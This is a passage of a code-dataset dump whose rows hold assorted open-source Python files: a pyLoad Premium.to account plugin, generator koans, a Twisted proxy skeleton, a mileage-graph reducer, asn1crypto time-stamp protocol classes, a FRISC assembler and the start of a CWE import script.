repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
mariusbaumann/pyload
|
module/plugins/accounts/PremiumTo.py
|
1
|
1286
|
# -*- coding: utf-8 -*-
from module.plugins.Account import Account
class PremiumTo(Account):
__name__ = "PremiumTo"
__type__ = "account"
__version__ = "0.06"
__description__ = """Premium.to account plugin"""
__license__ = "GPLv3"
__authors__ = [("RaNaN", "RaNaN@pyload.org"),
("zoidberg", "zoidberg@mujmail.cz"),
("stickell", "l.stickell@yahoo.it")]
def loadAccountInfo(self, user, req):
traffic = req.load("http://premium.to/api/traffic.php",
get={'username': self.username, 'password': self.password})
if "wrong username" not in traffic:
trafficleft = float(traffic.strip()) / 1024 #@TODO: Remove `/ 1024` in 0.4.10
return {'premium': True, 'trafficleft': trafficleft, 'validuntil': -1}
else:
return {'premium': False, 'trafficleft': None, 'validuntil': None}
def login(self, user, data, req):
self.username = user
self.password = data['password']
authcode = req.load("http://premium.to/api/getauthcode.php",
get={'username': user, 'password': self.password}).strip()
if "wrong username" in authcode:
self.wrongPassword()
|
gpl-3.0
| 4,571,049,506,377,407,500
| 34.722222
| 90
| 0.547434
| false
| 3.738372
| false
| false
| false
|
drewmoore/python-koans
|
python3/koans/about_generators.py
|
1
|
4571
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Written in place of AboutBlocks in the Ruby Koans
#
# Note: Both blocks and generators use a yield keyword, but they behave
# a lot differently
#
from runner.koan import *
class AboutGenerators(Koan):
def test_generating_values_on_the_fly(self):
result = list()
bacon_generator = (n + ' bacon' for n in ['crunchy','veggie','danish'])
for bacon in bacon_generator:
result.append(bacon)
self.assertEqual(['crunchy bacon', 'veggie bacon', 'danish bacon'], result)
def test_generators_are_different_to_list_comprehensions(self):
num_list = [x*2 for x in range(1,3)]
num_generator = (x*2 for x in range(1,3))
self.assertEqual(2, num_list[0])
# A generator has to be iterated through.
with self.assertRaises(TypeError): num = num_generator[0]
self.assertEqual(2, list(num_generator)[0])
# Both list comprehensions and generators can be iterated though. However, a generator
# function is only called on the first iteration. The values are generated on the fly
# instead of stored.
#
# Generators are more memory friendly, but less versatile
def test_generator_expressions_are_a_one_shot_deal(self):
dynamite = ('Boom!' for n in range(3))
attempt1 = list(dynamite)
attempt2 = list(dynamite)
self.assertEqual(['Boom!', 'Boom!', 'Boom!'], list(attempt1))
self.assertEqual([], list(attempt2))
# ------------------------------------------------------------------
def simple_generator_method(self):
yield 'peanut'
yield 'butter'
yield 'and'
yield 'jelly'
def test_generator_method_will_yield_values_during_iteration(self):
result = list()
for item in self.simple_generator_method():
result.append(item)
self.assertEqual(['peanut', 'butter', 'and', 'jelly'], result)
def test_coroutines_can_take_arguments(self):
result = self.simple_generator_method()
self.assertEqual('peanut', next(result))
self.assertEqual('butter', next(result))
result.close()
# ------------------------------------------------------------------
def square_me(self, seq):
for x in seq:
yield x * x
def test_generator_method_with_parameter(self):
result = self.square_me(range(2,5))
self.assertEqual([4, 9, 16], list(result))
# ------------------------------------------------------------------
def sum_it(self, seq):
value = 0
for num in seq:
# The local state of 'value' will be retained between iterations
value += num
yield value
def test_generator_keeps_track_of_local_variables(self):
result = self.sum_it(range(2,5))
self.assertEqual([2, 5, 9], list(result))
# ------------------------------------------------------------------
def generator_with_coroutine(self):
result = yield
yield result
def test_generators_can_take_coroutines(self):
generator = self.generator_with_coroutine()
# THINK ABOUT IT:
# Why is this line necessary?
#
# Hint: Read the "Specification: Sending Values into Generators"
# section of http://www.python.org/dev/peps/pep-0342/
next(generator)
self.assertEqual(3, generator.send(1 + 2))
def test_before_sending_a_value_to_a_generator_next_must_be_called(self):
generator = self.generator_with_coroutine()
try:
generator.send(1+2)
except TypeError as ex:
ex2 = ex
self.assertRegexpMatches(ex2.args[0], 'just-started')
# ------------------------------------------------------------------
def yield_tester(self):
value = yield
if value:
yield value
else:
yield 'no value'
def test_generators_can_see_if_they_have_been_called_with_a_value(self):
generator = self.yield_tester()
next(generator)
self.assertEqual('with value', generator.send('with value'))
generator2 = self.yield_tester()
next(generator2)
self.assertEqual('no value', next(generator2))
def test_send_none_is_equivalent_to_next(self):
generator = self.yield_tester()
next(generator)
# 'next(generator)' is exactly equivalent to 'generator.send(None)'
self.assertEqual('no value', generator.send(None))
|
mit
| -7,604,709,203,030,380,000
| 30.308219
| 94
| 0.564209
| false
| 4.006135
| true
| false
| false
|
lkundrak/scraperwiki
|
uml/httpproxy/swproxy.py
|
1
|
1826
|
import sys
from twisted.web import proxy, http
from twisted.python import log
log.startLogging(sys.stdout)
class ScraperProxyClient(proxy.ProxyClient):
def handleHeader( self, key, value ):
proxy.ProxyClient.handleHeader(self, key, value)
def handleResponsePart(self, data):
proxy.ProxyClient.handleResponsePart(self,data)
def handleResponseEnd(self):
proxy.ProxyClient.handleResponseEnd(self)
class ScraperProxyClientFactory(proxy.ProxyClientFactory):
def buildProtocol(self, addr):
client = proxy.ProxyClientFactory.buildProtocol(self, addr)
client.__class__ = ScraperProxyClient
return client
class ScraperProxyRequest(proxy.ProxyRequest):
protocols = { 'http': ScraperProxyClientFactory }
def __init__(self, *args):
proxy.ProxyRequest.__init__(self, *args)
def process(self):
# TODO Process self.uri to see if we are allowed to access it
# We probably want to do an ident with the current controller and
# probably a notify as well. Once we know we can carry on then
# we should
proxy.ProxyRequest.process(self)
class ScraperProxy(proxy.Proxy):
def __init__(self):
proxy.Proxy.__init__(self)
def requestFactory(self, *args):
return ScraperProxyRequest(*args)
class ScraperProxyFactory(http.HTTPFactory):
def __init__(self):
http.HTTPFactory.__init__(self)
def buildProtocol(self, addr):
protocol = ScraperProxy()
return protocol
if __name__ == '__main__':
from twisted.internet import reactor
px = ScraperProxyFactory()
reactor.listenTCP(9000, px)
reactor.run()
|
agpl-3.0
| -5,316,903,653,732,609,000
| 24.375
| 74
| 0.629244
| false
| 4.226852
| false
| false
| false
|
BartMassey/oregon-mileage
|
reduce-mileages.py
|
1
|
1800
|
# Copyright © 2014 Bart Massey
# [This work is licensed under the "MIT License"]
# Please see the file COPYING in the source
# distribution of this software for license terms.
# Given a mileage list, reduce it to a minimal set of edges
# that imply the same mileages.
# Strategy: Fill the whole list of edges into the
# result, then loop over all triples deleting implied edges.
from sys import stdin, stderr
def read_graph(f):
vs = set()
es = {}
for line in f:
(v1, v2, w) = line.split()
w = int(w)
vs |= {v1}
vs |= {v2}
e = tuple({v1, v2})
if e in es and es[e] != w:
print("warning: edge {%s, %s} mismatch %d / %d" % \
(v1, v2, es[e], w), file=stderr)
continue
es[e] = w
return (vs, es)
def reduced(g):
(vs, es) = g
res = es.copy()
for e in es:
for v in vs:
if e not in res:
continue
(v1, v2) = e
if v1 == v or v2 == v:
continue
e1 = tuple({v1, v})
e2 = tuple({v, v2})
if e1 not in es or e2 not in es:
continue
if es[e1] > es[e] or es[e2] > es[e]:
continue
if es[e1] + es[e2] > es[e]:
continue
if es[e1] + es[e2] < es[e]:
print("triangle error: %d vs %s-%d-%s-%d-%s" % \
(es[e], v1, es[e1], v, es[e2], v2), file=stderr)
continue
print("removing redundant %s %s" % (v1, v2), file=stderr)
del res[e]
return (vs, res)
def write_graph(g):
(_, es) = g
for e in es:
(v1, v2) = e
w = es[e]
print(v1, v2, w)
g = read_graph(stdin)
rg = reduced(g)
write_graph(rg)
|
mit
| -6,409,248,396,742,954,000
| 26.676923
| 70
| 0.473596
| false
| 3.117851
| false
| false
| false
|
eukaryote/asn1crypto
|
asn1crypto/tsp.py
|
1
|
8059
|
# coding: utf-8
"""
ASN.1 type classes for the time stamp protocol (TSP). Exports the following
items:
- TimeStampReq()
- TimeStampResp()
Also adds TimeStampedData() support to asn1crypto.cms.ContentInfo(),
TimeStampedData() and TSTInfo() support to
asn1crypto.cms.EncapsulatedContentInfo() and some oids and value parsers to
asn1crypto.cms.CMSAttribute().
Other type classes are defined that help compose the types listed above.
"""
from __future__ import unicode_literals, division, absolute_import, print_function
from .algos import DigestAlgorithm
from .cms import (
CMSAttribute,
CMSAttributeType,
ContentInfo,
ContentType,
EncapsulatedContentInfo,
)
from .core import (
Any,
BitString,
Boolean,
Choice,
GeneralizedTime,
IA5String,
Integer,
ObjectIdentifier,
OctetString,
Sequence,
SequenceOf,
SetOf,
UTF8String,
)
from .crl import CertificateList
from .x509 import (
Attributes,
CertificatePolicies,
GeneralName,
GeneralNames,
)
# The structures in this file are based on https://tools.ietf.org/html/rfc3161,
# https://tools.ietf.org/html/rfc4998, https://tools.ietf.org/html/rfc5544,
# https://tools.ietf.org/html/rfc5035, https://tools.ietf.org/html/rfc2634
class Version(Integer):
_map = {
0: 'v0',
1: 'v1',
2: 'v2',
3: 'v3',
4: 'v4',
5: 'v5',
}
class MessageImprint(Sequence):
_fields = [
('hash_algorithm', DigestAlgorithm),
('hashed_message', OctetString),
]
class Accuracy(Sequence):
_fields = [
('seconds', Integer, {'optional': True}),
('millis', Integer, {'tag_type': 'implicit', 'tag': 0, 'optional': True}),
('micros', Integer, {'tag_type': 'implicit', 'tag': 1, 'optional': True}),
]
class Extension(Sequence):
_fields = [
('extn_id', ObjectIdentifier),
('critical', Boolean, {'default': False}),
('extn_value', OctetString),
]
class Extensions(SequenceOf):
_child_spec = Extension
class TSTInfo(Sequence):
_fields = [
('version', Version),
('policy', ObjectIdentifier),
('message_imprint', MessageImprint),
('serial_number', Integer),
('gen_time', GeneralizedTime),
('accuracy', Accuracy, {'optional': True}),
('ordering', Boolean, {'default': False}),
('nonce', Integer, {'optional': True}),
('tsa', GeneralName, {'tag_type': 'explicit', 'tag': 0, 'optional': True}),
('extensions', Extensions, {'tag_type': 'implicit', 'tag': 1, 'optional': True}),
]
class TimeStampReq(Sequence):
_fields = [
('version', Version),
('message_imprint', MessageImprint),
('req_policy', ObjectIdentifier, {'optional': True}),
('nonce', Integer, {'optional': True}),
('cert_req', Boolean, {'default': False}),
('extensions', Extensions, {'tag_type': 'implicit', 'tag': 0, 'optional': True}),
]
class PKIStatus(Integer):
_map = {
0: 'granted',
1: 'granted_with_mods',
2: 'rejection',
3: 'waiting',
4: 'revocation_warning',
5: 'revocation_notification',
}
class PKIFreeText(SequenceOf):
_child_spec = UTF8String
class PKIFailureInfo(BitString):
_map = {
0: 'bad_alg',
2: 'bad_request',
5: 'bad_data_format',
14: 'time_not_available',
15: 'unaccepted_policy',
16: 'unaccepted_extensions',
17: 'add_info_not_available',
25: 'system_failure',
}
class PKIStatusInfo(Sequence):
_fields = [
('status', PKIStatus),
('status_string', PKIFreeText, {'optional': True}),
('fail_info', PKIFailureInfo, {'optional': True}),
]
class TimeStampResp(Sequence):
_fields = [
('status', PKIStatusInfo),
('time_stamp_token', ContentInfo),
]
class MetaData(Sequence):
_fields = [
('hash_protected', Boolean),
('file_name', UTF8String, {'optional': True}),
('media_type', IA5String, {'optional': True}),
('other_meta_data', Attributes, {'optional': True}),
]
class TimeStampAndCRL(SequenceOf):
_fields = [
('time_stamp', EncapsulatedContentInfo),
('crl', CertificateList, {'optional': True}),
]
class TimeStampTokenEvidence(SequenceOf):
_child_spec = TimeStampAndCRL
class DigestAlgorithms(SequenceOf):
_child_spec = DigestAlgorithm
class EncryptionInfo(Sequence):
_fields = [
('encryption_info_type', ObjectIdentifier),
('encryption_info_value', Any),
]
class PartialHashtree(SequenceOf):
_child_spec = OctetString
class PartialHashtrees(SequenceOf):
_child_spec = PartialHashtree
class ArchiveTimeStamp(Sequence):
_fields = [
('digest_algorithm', DigestAlgorithm, {'tag_type': 'implicit', 'tag': 0, 'optional': True}),
('attributes', Attributes, {'tag_type': 'implicit', 'tag': 1, 'optional': True}),
('reduced_hashtree', PartialHashtrees, {'tag_type': 'implicit', 'tag': 2, 'optional': True}),
('time_stamp', ContentInfo),
]
class ArchiveTimeStampSequence(SequenceOf):
_child_spec = ArchiveTimeStamp
class EvidenceRecord(Sequence):
_fields = [
('version', Version),
('digest_algorithms', DigestAlgorithms),
('crypto_infos', Attributes, {'tag_type': 'implicit', 'tag': 0, 'optional': True}),
('encryption_info', EncryptionInfo, {'tag_type': 'implicit', 'tag': 1, 'optional': True}),
('archive_time_stamp_sequence', ArchiveTimeStampSequence),
]
class OtherEvidence(Sequence):
_fields = [
('oe_type', ObjectIdentifier),
('oe_value', Any),
]
class Evidence(Choice):
_alternatives = [
('tst_evidence', TimeStampTokenEvidence, {'tag_type': 'implicit', 'tag': 0}),
('ers_evidence', EvidenceRecord, {'tag_type': 'implicit', 'tag': 1}),
('other_evidence', OtherEvidence, {'tag_type': 'implicit', 'tag': 2}),
]
class TimeStampedData(Sequence):
_fields = [
('version', Version),
('data_uri', IA5String, {'optional': True}),
('meta_data', MetaData, {'optional': True}),
('content', OctetString, {'optional': True}),
('temporal_evidence', Evidence),
]
class IssuerSerial(Sequence):
_fields = [
('issuer', GeneralNames),
('serial_number', Integer),
]
class ESSCertID(Sequence):
_fields = [
('cert_hash', OctetString),
('issuer_serial', IssuerSerial, {'optional': True}),
]
class ESSCertIDs(SequenceOf):
_child_spec = ESSCertID
class SigningCertificate(Sequence):
_fields = [
('certs', ESSCertIDs),
('policies', CertificatePolicies, {'optional': True}),
]
class SetOfSigningCertificates(SetOf):
_child_spec = SigningCertificate
class ESSCertIDv2(Sequence):
_fields = [
('hash_algorithm', DigestAlgorithm, {'default': 'sha256'}),
('cert_hash', OctetString),
('issuer_serial', IssuerSerial, {'optional': True}),
]
class ESSCertIDv2s(SequenceOf):
_child_spec = ESSCertIDv2
class SigningCertificateV2(Sequence):
_fields = [
('certs', ESSCertIDv2s),
('policies', CertificatePolicies, {'optional': True}),
]
class SetOfSigningCertificatesV2(SetOf):
_child_spec = SigningCertificateV2
EncapsulatedContentInfo._oid_specs['tst_info'] = TSTInfo
EncapsulatedContentInfo._oid_specs['timestamped_data'] = TimeStampedData
ContentInfo._oid_specs['timestamped_data'] = TimeStampedData
ContentType._map['1.2.840.113549.1.9.16.1.4'] = 'tst_info'
ContentType._map['1.2.840.113549.1.9.16.1.31'] = 'timestamped_data'
CMSAttributeType._map['1.2.840.113549.1.9.16.2.12'] = 'signing_certificate'
CMSAttribute._oid_specs['signing_certificate'] = SetOfSigningCertificates
CMSAttributeType._map['1.2.840.113549.1.9.16.2.47'] = 'signing_certificate_v2'
CMSAttribute._oid_specs['signing_certificate_v2'] = SetOfSigningCertificatesV2
|
mit
| -1,249,433,928,822,161,400
| 24.996774
| 101
| 0.617446
| false
| 3.464746
| false
| false
| false
|
zjurelinac/pyFrisc
|
assembler.py
|
1
|
14214
|
from itertools import chain
from math import ceil, log
from utils import *
import os.path
import re
import sys
import yaml
data = dict()
labels = dict()
memory = []
maxnum = 0
# Helper
def show_error( s ):
return s, False
# Helper
def round_to_word( i ):
return int( int( i/data[ 'consts' ][ 'words_per_line' ] + 1 ) * data[ 'consts' ][ 'words_per_line' ]
if i%data[ 'consts' ][ 'words_per_line' ] != 0 else i )
# Helper?
def args_len( args ):
n = 0
while args:
_, args = parse_constant( args )
n += 1
return n
# Procedure
def place_in_mem( res, n ):
for i in range( 0, data[ 'consts' ][ 'words_per_line' ] ):
memory[ n ] = res[ data[ 'consts' ][ 'word_size' ]*i : data[ 'consts' ][ 'word_size' ]*(i+1) ]
n += 1
# Helper
def to_little_endian( x, n ):
i = 0
arr = []
for i in range( 0, n ):
arr.append( x[ data[ 'consts' ][ 'word_size' ]*i : data[ 'consts' ][ 'word_size' ]*(i+1) ] )
return ''.join( reversed( arr ) )
# Function, helper
def parse_constant( args, leftovers = True ):
if not args:
raise ValueError( 'Nothing to parse.' )
if args[ 0 ][ 0 ] == '%':
r = int( args[ 1 ], data[ 'consts' ][ 'base_code' ][ args[ 0 ][ 1 ] ] )
a = args[ 2: ] if len( args ) > 2 else []
elif args[ 0 ][ 0 ].isdigit():
r = int( args[ 0 ], data[ 'consts' ][ 'default_base' ] )
a = args[ 1: ] if len( args ) > 1 else []
elif args[ 0 ][ 0 ] == '-':
r = -int( args[ 1 ] , data[ 'consts' ][ 'default_base' ] )
a = args[ 2: ] if len( args ) > 2 else []
elif args[ 0 ] in labels:
r = labels[ args[ 0 ] ]
a = args[ 1: ] if len( args ) > 1 else []
else:
raise ValueError( 'Unknown arguments, cannot parse.' )
if abs( r ) > 2**32:
raise ValueError( 'Constant larger than 32 bits.' )
if not leftovers:
if a: raise ValueError( 'Extra symbols in line.' )
else: return r
else:
return [ r, a ]
# Function, helper
def parse_reg( arg ):
return data[ 'codes' ][ 'REG' ][ arg ]
# Function, helper
def parse_src2( args ):
try:
res = parse_reg( args[ 0 ] ), args[ 1: ]
except KeyError:
res = parse_constant( args, True )
res[ 0 ] = extend20( res[ 0 ] )
return res
# Function
def parse_aluop( cmd, args ):
src1 = parse_reg( args[ 0 ] )
src2, args = parse_src2( args[ 1: ] )
dest = parse_reg( args[ 0 ] )
result = to_little_endian( data[ 'codes' ][ 'ALU' ][ cmd ] + ( '0' if len( src2 ) == 3 else '1' )
+ dest + src1 + src2 + ( '0'*17 if len( src2 ) != 20 else '' ), data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_memop( cmd, args ):
reg = parse_reg( args[ 0 ] )
result = data[ 'codes' ][ 'MEM' ][ cmd ]
if args[ 1 ] != '(':
raise ValueError
try:
loc = parse_reg( args[ 2 ] )
shift = 0
sign = '+'
if args[ 3 ] != ')':
sign = args[ 3 ]
shift, args = parse_constant( args[ 4: ], True )
if len( args ) != 1 and args[ 0 ] != ')':
raise ValueError( 'Incorrect command form.' )
shift = extend20( ( -1 if sign == '-' else 1 ) * shift )
result += '1' + reg + loc + shift
except KeyError:
if args[ 2 ] in labels:
loc = labels[ args[ 2 ] ]
if args[ 3 ] != ')':
raise ValueError( 'Incorrect absolute addressing.' )
else:
loc, args = parse_constant( args[ 2: ], True )
if len( args ) != 1 and args[ 0 ] != '=':
raise ValueError( 'Incorrect command form.' )
loc = extend20( loc )
result += '0' + reg + '000' + loc
result = to_little_endian( result, data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_stackop( cmd, args ):
dest = parse_reg( args[ 0 ] )
result = to_little_endian( data[ 'codes' ][ 'STACK' ][ cmd ] + '0' + dest + '0'*23, data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_ctrlop( cmd, args ):
if args[ 0 ] == '_':
flag = args[ 1 ]
args = args[ 2: ] if len( args ) > 2 else []
else: flag = '$'
if args[ 0 ] == '(':
op = '0'
loc = parse_reg( args[ 1 ] ) + '0'*17
else:
op = '1'
loc = extend20( parse_constant( args, False ) )
result = to_little_endian( data[ 'codes' ][ 'CTRL' ][ cmd ] + op + data[ 'codes' ][ 'COND' ][ flag ]
+ '00' + loc, data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_retop( cmd, args ):
flag = args[ 1 ] if args and args[ 0 ] == '_' else '$'
result = to_little_endian( data[ 'codes' ][ 'RET' ][ cmd ] + '0' + data[ 'codes' ][ 'COND' ][ flag ]
+ 20*'0' + data[ 'codes' ][ 'RET_CODE' ][ cmd ], data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_moveop( cmd, args ):
a = '0'
src = '000'
srcSR = False
dest = '000'
destSR = False
if args[ 0 ] == 'SR':
args = args[ 1: ]
srcSR = True
elif args[ 0 ] in data[ 'codes' ][ 'REG' ]:
src = parse_reg( args[ 0 ] )
args = args[ 1: ]
else:
a = '1'
src, args = parse_constant( args, True )
src = extend20( src )
if args[ 0 ] != 'SR':
dest = parse_reg( args[ 0 ] )
else:
destSR = True
result = to_little_endian( data[ 'codes' ][ 'MOVE' ] + a + dest + '0' + '{:b}{:b}'.format( srcSR, destSR )
+ src + ( '0'*17 if len( src ) == 3 else '' ), data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_jr( cmd, args, n ):
if args[ 0 ] == '_':
flag = args[ 1 ]
args = args[ 2: ] if len( args ) > 2 else []
else: flag = '$'
# TODO: Beware, if label, that's ok, if a bare number, NOT OK, won't jump N places forward but to address N
offset = parse_constant( args, False )
result = to_little_endian( data[ 'codes' ][ 'JR' ] + '1' + data[ 'codes' ][ 'COND' ][ flag ] + '00'
+ extend20( offset - n - 4 ), data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_cmp( cmd, args ):
src1 = parse_reg( args[ 0 ] )
src2, args = parse_src2( args[ 1: ] )
result = to_little_endian( data[ 'codes' ][ 'CMP' ] + ( '0' if len( src2 ) == 3 else '1' )
+ '000' + src1 + src2 + ( '0'*17 if len( src2 ) != 20 else '' ), data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def define_data( cmd, args, n ):
if len(args) < 1:
raise ValueError('Incorrect command format.')
size = data[ 'consts' ][ 'define_data' ][ cmd ]*data[ 'consts' ][ 'word_size' ]
p = []
while args:
x, args = parse_constant( args )
if not fits_into( x, size ):
raise ValueError( 'Cannot place data in memory, {} is too big for {} bits.'.format( x, size ) )
t = to_little_endian( ( '{:0>' + str( size ) + 'b}' ).format( x ), size // data[ 'consts' ][ 'word_size' ] )
p.append( t )
for i in range( 0, size ):
y = t[ data[ 'consts' ][ 'word_size' ]*i : data[ 'consts' ][ 'word_size' ]*(i+1) ]
memory[ n ] = y
n += 1
return p
# Function
def define_space( cmd, args, n ):
len = parse_constant( args, False )
for i in range( 0, len ):
memory[ n+i ] = '0'*data[ 'consts' ][ 'word_size' ]
return [ '0'*data[ 'consts' ][ 'line_size' ] ]* ceil( len/data[ 'consts' ][ 'words_per_line' ] )
# Function
def parse_lines( ls ):
lines = []
num = 0
for l in ls:
res = { 'original' : l }
sl = l.upper().split( ';', maxsplit = 1 )[ 0 ]
if sl:
res[ 'blank' ] = False
if sl[ 0 ].isspace(): lab = ''
else:
t = sl.split( maxsplit = 1 )
lab = t[ 0 ]
sl = t[ 1 ] if len( t ) > 1 else ''
ls = re.split( data[ 'consts' ][ 'separators' ], sl.strip() )
res[ 'cmd' ] = ls[ 0 ]
res[ 'args' ] = [ x for x in ls[ 1: ] if x ] if len( ls ) > 1 else []
if not res[ 'cmd' ]: res[ 'blank' ] = True
if res[ 'cmd' ] == data[ 'consts' ][ 'origin_cmd' ]:
nnum = round_to_word( parse_constant( res[ 'args' ] )[ 0 ] )
if nnum < num:
raise ValueError( res[ 'original' ] + ' :: Impossible origin, location too small' )
num = nnum
if lab: labels[ lab ] = num
res[ 'blank' ] = True
elif res[ 'cmd' ] == data[ 'consts' ][ 'equals_cmd' ]:
if lab: labels[ lab ] = parse_constant( res[ 'args' ] )[ 0 ]
res[ 'blank' ] = True
elif res[ 'cmd' ] in data[ 'consts' ][ 'define_data' ]:
if lab: labels[ lab ] = num
res[ 'num' ] = num
num += round_to_word( args_len( res[ 'args' ] )*data[ 'consts' ][ 'define_data' ][ res[ 'cmd' ] ] )
elif res[ 'cmd' ] == data[ 'consts' ][ 'define_space' ]:
if lab: labels[ lab ] = num
res[ 'num' ] = num
num += round_to_word( parse_constant( res[ 'args' ] )[ 0 ] )
elif res[ 'cmd' ]:
if lab: labels[ lab ] = num
res[ 'num' ] = num
num += data[ 'consts' ][ 'words_per_line' ]
else:
if lab: labels[ lab ] = num
if 'num' not in res:
res[ 'num' ] = -1
else:
res[ 'blank' ] = True
res[ 'num' ] = -1
lines.append( res )
if num >= data[ 'consts' ][ 'max_memory' ]:
raise ValueError( 'Too much memory used' )
global maxnum
maxnum = num
return lines
# Main function
def assemble( f ):
""" Assembles the contents of a file f
This function takes a name f of a file containing FRISC assembler code,
and translates it into machine code.
Two new files are created:
1. readable file containing the machine code together with it's source
2. binary file containing only the machine code
"""
global data, memory, maxnum
data = yaml.load( open( 'config/definitions/frisc.lang.yaml', 'r' ).read() )
memory = [ '00000000' ] * data[ 'consts' ][ 'max_memory' ]
try:
pls = parse_lines( open( f ).read().splitlines() )
except Exception as e:
return show_error( 'An error occurred in first pass: ' + str( e ) )
adr_len = data[ 'consts' ][ 'line_size' ] // 4
prt_len = len( bin_to_pretty_hex( '0' * data[ 'consts' ][ 'line_size' ] ) )
path = os.path.abspath( f )
base = path.rsplit( '.', maxsplit = 1 )[ 0 ]
pfile = open( base + '.p', 'w' )
# efile = open( base + '.e', 'wb' )
j = 1
for p in pls:
if not p[ 'blank' ]:
try:
multiple = False
if p[ 'cmd' ] == 'END':
break
elif p[ 'cmd' ] in data[ 'codes' ][ 'ALU' ]:
p[ 'parsed' ] = parse_aluop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'codes' ][ 'MEM' ]:
p[ 'parsed' ] = parse_memop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'codes' ][ 'STACK' ]:
p[ 'parsed' ] = parse_stackop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'codes' ][ 'CTRL' ]:
p[ 'parsed' ] = parse_ctrlop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'codes' ][ 'RET' ]:
p[ 'parsed' ] = parse_retop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] == 'MOVE':
p[ 'parsed' ] = parse_moveop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] == 'CMP':
p[ 'parsed' ] = parse_cmp( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] == 'JR':
p[ 'parsed' ] = parse_jr( p[ 'cmd' ], p[ 'args' ], p[ 'num' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'consts' ][ 'define_data' ]:
p[ 'parsed' ] = define_data( p[ 'cmd' ], p[ 'args' ], p[ 'num' ] )
multiple = True
elif p[ 'cmd' ] == data[ 'consts' ][ 'define_space' ]:
p[ 'blank' ] = True
else:
print( p )
raise ValueError( 'Unknown command' )
except Exception as e:
return show_error( 'An error occurred in second pass on line ' + str( j )
+ ':' + p[ 'original' ] + ' :: ' + str( e ) )
if p[ 'blank' ]:
pfile.write(( ' ' * ( adr_len + prt_len + 4 ) + p[ 'original' ] )
[ :data[ 'consts' ][ 'max_source_line_length' ] ] + '\n')
else:
if multiple:
pfile.write(( ('{:0>' + str( adr_len ) + 'X} ' ).format( p[ 'num' ] ) +
bin_to_pretty_hex( p[ 'parsed' ][ 0 ] ) + ' ' + p[ 'original' ] )
[ :data[ 'consts' ][ 'max_source_line_length' ] ] + '\n')
for i in p[ 'parsed' ][ 1: ]:
pfile.write( ' '*( adr_len + 2 ) + bin_to_pretty_hex( i ) + '\n' )
else:
pfile.write(( ('{:0>' + str( adr_len ) + 'X} ' ).format( p[ 'num' ] ) +
bin_to_pretty_hex( p[ 'parsed' ] ) + ' ' + p[ 'original' ] )
[ :data[ 'consts' ][ 'max_source_line_length' ] ] + '\n')
j += 1
pfile.close()
# efile.close()
return 'Source successfully assembled.', True
if __name__ == "__main__":
print( assemble( sys.argv[ 1 ] ) )
|
mit
| 4,892,226,237,462,093,000
| 34.358209
| 126
| 0.459195
| false
| 3.228253
| false
| false
| false
|
deontp/misc
|
zenoic_api/cve-search-master/sbin/db_mgmt_cwe.py
|
1
|
3714
|
#!/usr/bin/env python3
#
# Import script of NIST CWE Common Weakness Enumeration.
#
# Until now, the import is only import Weakness description.
#
# The format is the following:
#
# { "_id" : ObjectId("52b70521b261026f36818515"), "weaknessabs" : "Variant",
# "name" : "ASP.NET Misconfiguration: Missing Custom Error Page",
# "description_summary" : "An ASP .NET application must enable custom error
# pages in order to prevent attackers from mining information from the
# framework's built-in responses.An ASP .NET application must enable custom
# error pages in order to prevent attackers from mining information from the
# framework's built-in responses.", "status" : "Draft", "id" : "12" }
#
# Software is free software released under the "Modified BSD license"
#
# Copyright (c) 2013-2014 Alexandre Dulaunoy - a@foo.be
# Copyright (c) 2015-2016 Pieter-Jan Moreels - pieterjan.moreels@gmail.com
# Imports
import os
import sys
runPath = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(runPath, ".."))
from dateutil.parser import parse as parse_datetime
from xml.sax import make_parser
from xml.sax.handler import ContentHandler
import argparse
import zipfile
import tempfile
from lib.ProgressBar import progressbar
from lib.Config import Configuration
import lib.DatabaseLayer as db
argparser = argparse.ArgumentParser(description='populate/update NIST CWE Common Weakness Enumeration database')
argparser.add_argument('-v', action='store_true', help='verbose output')
args = argparser.parse_args()
class CWEHandler(ContentHandler):
def __init__(self):
self.cwe = []
self.description_summary_tag = False
self.weakness_tag = False
def startElement(self, name, attrs):
if name == 'Weakness':
self.weakness_tag = True
self.statement = ""
self.weaknessabs = attrs.get('Weakness_Abstraction')
self.name = attrs.get('Name')
self.idname = attrs.get('ID')
self.status = attrs.get('Status')
self.cwe.append({'name': self.name, 'id': self.idname, 'status': self.status, 'weaknessabs': self.weaknessabs})
elif name == 'Description_Summary' and self.weakness_tag:
self.description_summary_tag = True
self.description_summary = ""
def characters(self, ch):
if self.description_summary_tag:
self.description_summary += ch.replace(" ", "")
